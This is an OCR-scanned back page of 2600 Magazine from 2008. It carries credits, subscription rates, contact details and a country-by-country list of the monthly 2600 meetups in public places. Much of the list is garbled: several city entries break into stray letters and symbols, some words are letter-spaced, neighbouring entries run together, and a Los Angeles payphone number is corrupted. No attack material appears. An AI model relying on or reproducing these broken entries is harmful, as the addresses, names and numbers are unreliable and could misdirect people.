Inspirational Music: Kylie Minogue, Anti-Flag, Adam Green, Phathead/Ogun, The Album Leaf, Mullyman, Steve Earle, Lucienne Boyer, Tyree Colion, Elliott Smith, DJ Shadow, Mikey Dread
Shout Outs: Alain Mueller, Brauerei Loscher, AI and Zach, the AMD team, the Wiley crew, WKKX in Wheeling, Cory Doctorow, Lexicon, Daravinne, aestetix, Alpha Centauri, Marc Tobias, Phil Torrone, Rat Man, Froggy
RIP: Arthur C. Clarke, Hopscotch
YEARLY SUBSCRIPTIONS:
U.S. and Canada $24 individual, $50 corporate (U.S. Funds)
Overseas $34 individual, $65 corporate
Back issues available for 1984-2007 at $25 per year, $34 per year overseas
Individual issues available from 1988 on at $6.25 each, $8.50 each overseas
LETTERS AND ARTICLE SUBMISSIONS:
2600 Editorial Dept., P.O. Box 99, Middle Island, NY 11953-0099 USA (letters@2600.com, articles@2600.com)
2600 Office Line: +1 631 751 2600
2600 Fax Line: +1 631 474 2677
Copyright 2008; 2600 Enterprises Inc.
ARGENTINA
Buenos Aires: The "Cruzat Beer House" bar, Sarmiento 1617 (first floor, Paseo La Plaza).
AUSTRALIA
Melbourne: Caffeine at ReVault Bar, 16 Swanston Walk, near Melbourne Central Shopping Centre. 6:30 pm
Sydney: The Crystal Palace, front bar/bistro, opposite the bus station area on George St at Central Station. 6 pm
AUSTRIA
Graz: Cafe Haltestelle on Jakominiplatz.
BRAZIL
Belo Horizonte: Pelego's Bar at Assufeng, near the payphone. 6 pm
CANADA
Alberta
Calgary: Eau Claire Market food court by the bland yellow wall. 6 pm
British Columbia
Victoria: QV Bakery and Cafe, 1701 Government St.
Manitoba
Winnipeg: St. Vital Shopping Centre, food court by HMV.
New Brunswick
Moncton: Champlain Mall food court, near KFC. 7 pm
Ontario
Barrie: William's Coffee Pub, 505 Bryne Dr. 7 pm
Guelph: William's Coffee Pub, 492 Edinbourgh Rd S. 7 pm
a
Mb
e` ';dff
l a
z
a,
6: 30 pm
Toronto: Free Times Cafe, College and Spadina.
Windsor: University of Windsor, CAW Student Center commons area by the large window. 7 pm
Quebec
Montreal: Bell Amphitheatre, 1000, rue de la Gauchetiere.
CHINA
Hong Kong: Pacific Coffee in Festival Walk, Kowloon Tong. 7 pm
CZECH REPUBLIC
Prague: Legenda pub. 6 pm
DENMARK
Aalborg: Fast Eddie's pool hall.
Aarhus: In the far corner of the DSB cafe in the railway station.
Copenhagen: Cafe Blasen.
Sonderborg: ColcDrll en. 7:30 pm
EGYPT
Port Said: At the foot of the Obelisk (El Missallah).
ENGLAND
Brighton: At the phone boxes by the Sealife Centre (across the road from the Palace Pier). Payphone: (01273) 606674. pm
Exeter: At the payphones, Bedford Square. 7 pm
Kent: At the end of the bus station opposite Wilkinsons, Canterbury. 6:30 pm
London: Trocadero Shopping Center (near Piccadilly Circus), lowest level. 6:30 pm
Manchester: Bulls Head Pub on London Rd. 7:30 pm
Norwich: Borders entrance to Chapelfield Mall. n pm
Reading: Afro Bar, Merchants Place, off Fri :i
A
6r
D
m
Helsinki: Fenniakortteli food court (Vuorikatu 14).
FRANCE
Grenoble: Eve, campus of St. Martin d'Heres. 6 pm
Lille: Grand-Place (Place Charles de Gaulle) in front of the Furet du Nord bookstore. 9 pm
Paris: Place de la Republique, near the (empty) fountain. 6:30 pm
Rennes: In front of the store "Blue Box" close to Place de la Republique. 8 pm
GREECE
Athens: Outside the bookstore Papasotiriou on the corner of Patision and Stournari. 7 pm
IRELAND
Dublin: At the phone booths on Wicklow St beside Tower Records. 7 pm
ITALY
Milan: Piazza Loreto in front of McDonalds.
JAPAN
Tokyo: Linux Cafe in Akihabara district. 6 pm
NEW ZEALAND
Auckland: London Bar, upstairs, Wellesley St, Auckland Central. 5:30 pm
Christchurch: Java Cafe, corner of High St and Manchester St. 6 pm
Wellington: Load Cafe in Cuba Mall. 6 pm
MEXICO
Mexico City: "Zocalo" Subway Station (Line 2 of the "METRO" subway, the blue one). At the "Departamento del Distrito Federal" exit, near the payphones and the candy shop, at the beginning of the "Zocalo-Pino Suarez" tunnel.
NORWAY
Oslo: Oslo Sentral Train Station. 7 pm
Tromsoe: The upper floor at Blaa Rock Cafe, Strandgata 14. 6 pm
Trondheim: Rick's Cafe in Nordregate. 6 pm
PERU
Lima: Barbilonia (ex Apu Bar), en Alcanfores 455, Miraflores, at the end of Tarata St. 8 pm
SCOTLAND
a
o
s
i:m 1 .
7 pm
SOUTH AFRICA
Johannesburg (Sandton City): Sandton food court. 6:30 pm
SWEDEN
Gothenburg: 2nd floor in Burger
ko
n
6tsdava.
SWITZERLAND
Lausanne: In front of the MacDo beside the train station. 7 pm
UNITED STATES
Alabama
Auburn: The student lounge upstairs in the Foy Union
i
.fi.:; nl i eo's Sub Vi l l a on
Jordan Lane.
Tuscaloosa: McFarland Mall food court near the front entrance.
Arizona
Phoenix: Unlimited Coffee (741 E. Glendale Ave). 6 pm
Tucson: Borders in the Park Mall. 7 pm
California
Irvine: Panera Bread, 3988 Barranca Parkway. 7 pm
Los Angeles: Union Station, corner of Macy & Alameda. Inside main entrance by bank of phones. Payphones: , 2 J 3 i 'J 2 -'JS J 9, 920, 625-9923, 9924; 613-9704, 9746.
Monterey: Mucky Duck, 479 Alvarado St. 5:30 pm.
Sacramento: Round Table Pizza at 127 K St.
San Diego: Regents Pizza, 4150 Regents Park Row #170.
San Francisco: 4 Embarcadero Plaza (inside). 5:30 pm
San Jose: Outside the cafe at the MLK Library at 4th and E San Fernando. 6 pm
Colorado
Boulder: Wing Zone food court, 13th and College. 6 pm
Lakewood: Barnes and Noble in the Denver West Shopping Center, 14347 W Colfax Ave.
District of Columbia
Arlington: Pentagon City Mall by the phone booths next to Panda Express. 6 pm
Florida
Ft. Lauderdale: Broward Mall in the food court. 6 pm
Gainesville: In the back of the University of Florida's Reitz Union food court. 6 pm
Melbourne: House of Joe Coffee House, 1220 W New Haven
Fashion Square Mall Food Court between Hovan Gourmet and Manchu Wok. 6 pm
Tampa: University Mall in the back of the food court on the 2nd floor. 6 pm
Atlanta: Lenoe:'l
i
food court.
7 pm
Idaho
Boise: BSU Student Union Building, upstairs from the main entrance. Payphones: (208) 342-9700, 9701.
Pocatello: College Market, 604 S 8th St.
Illinois
'I
a
ib
i
".
h
,
k
and
Rd. 7 pm
Indiana
Evansville: Barnes and Noble cafe at 624 S Green River Rd.
Ft. Wayne: Glenbrook Mall food court in front of Sbarro's. 6 pm
Indianapolis: Mo'Joe Coffee House, 222 W Michigan St.
South Bend (Mishawaka): Barnes and Noble cafe, 4601 Grape Rd.
Iowa
Ames: Memorial Union Building food court at the Iowa State University.
Kansas
rk
sa
al
i
"
d Prk): Oak
Wichita: Ri versi de Perk, 1 1 44
Bi tti ng Ave.
Louisiana
Baton Rouge: In the LSU Uni on
Bui l di ng, between t he Ti ger Puse
& McDonal d's. 6 pm
New Orleans: Z' otz Coffee House
uptown at 82 1 0 Oak St. 6 pm
Maine
Portland: Mai ne Ma l l by the
bench at the food court door.
Maryland
Baltimore: Bares & Nobl e cafe at
the I nner Harbor.
Massachusetts
Boston: Prudent i al Center Pl aza,
tprr(lce food court at the tabl es
near the wi ndows. 6 pm
Marlborough: Sol omon Park Mal l
food court. 6 pm
Northampton: Downsta i rs of
Hayma rket Cafe. 6 pm
Michigan
Ann Arbor: Starbucks i n The
Gal l eri a on S Uni versi ty.
Minnesota
Bloomington: Ma l l of Ameri ca,
north si de food court , across
from Burger Ki ng & the bank
of payphones that don't take
i ncomi ng cal i s.
Missouri
Kansas City ( I ndependence):
Barnes & Noble, 1 9 1 20 E 39th St.
St. Louis: Gal l eri a Food Court.
Springfield: Borders Books and
Musi c cof feeshop, 3300 S Gl en
stone Ave, one bl ock sout h of
Bat t l efi el d Ma l l . 5: 30 pm
Nebraska
Omaha: Crossroads Mall Food Court. 7 pm
Nevada
Las Vegas: reJAVAnate Coffee, 3300 E Flamingo Rd (at Pecos). 7 pm
New Mexico
Albuquerque: University of New Mexico Student Union Building (plaza "lower" level lounge), main campus. Payphones: 505-843-9033, 505-843-9034. 5:30 pm
New York
New York: Citigroup Center, in the lobby, near the payphones, 153 E 53rd St, between Lexington & 3rd.
Rochester: Panera Bread, 2373 W Ridge Rd. 7:30 pm
North Carolina
Charlotte: South Park Mall food court. 7 pm
Raleigh: Royal Bean coffee shop on Hillsboro St (next to the Playmakers Sports Bar and across from Meredith College).
Wilmington: The Connection Internet Cafe, 250-1 Racine Drive, Racine Commons Shopping Center.
North Dakota
Fargo: West Acres Mall food court by the Taco John's. 6 pm
Ohio
Cincinnati: The Brew House, 1047 E McMillan. 7 pm
Cleveland: University Circle Arabica, 11300 Juniper Rd. Upstairs, turn right, second room on left.
Columbus: Convention center on street level around the corner from the food court.
Dayton: TGI Friday's off 725 by the Dayton Mall.
Oklahoma
Oklahoma City: Cafe Bella, southeast corner of SW 89th St and Penn.
Tulsa: Promenade Mall food court.
Oregon
Portland: Backspace Cafe, 115 NW 5th Ave. 6 pm
Pennsylvania
Allentown: Panera Bread, 3100 W Tilghman St. 6 pm
Harrisburg: Panera Bread, 4263 Union Deposit Rd. 6 pm
Philadelphia: 30th St Station, southeast food court near mini post office.
South Carolina
Charleston: Northwoods Mall in the hall between Sears and Chik-Fil-A.
South Dakota
Sioux Falls: Empire Mall, by Burger King.
Tennessee
Knoxville: Borders Books Cafe across from Westown Mall.
Memphis: Quetzal, 664 Union
h.iG Vanderbilt University Hill Center, Room 151, 1231 18th Ave S. 6 pm
Texas
r
n
t,
s
ft r
s
:c
'
f
8
-Tnfa's Express in front of Nordstrom's in the Galleria Mall.
San Antonio: North Star Mall food court. 6 pm
Utah
Salt Lake City: ZCMI Mall in The Park Food Court.
Vermont
h
t
S
t
n
d
o
!
n
a
t
t
he
second floor of the cafe.
Virginia
Arlington: (see District of Columbia)
Charlottesville: Panera Bread at the Barracks Road Shopping Center. 6:30 pm.
Virginia Beach: Lynnhaven Mall on Lynnhaven Parkway. 6 pm
Washington
tt
n:
s
1
e
,
t
h
onven
-
side. 6 pm
Spokane: Coffee Station, 9315 N Nevada (North Spokane). 6 pm
Wisconsin
Madison: Fair Trade Coffee House, 418 State St.
All meetings take place on the first Friday of the month. Unless otherwise noted, they start at 5 pm local time. To start a meeting in your city, send email to meetings@2600.com.
Page 66, 2600 Magazine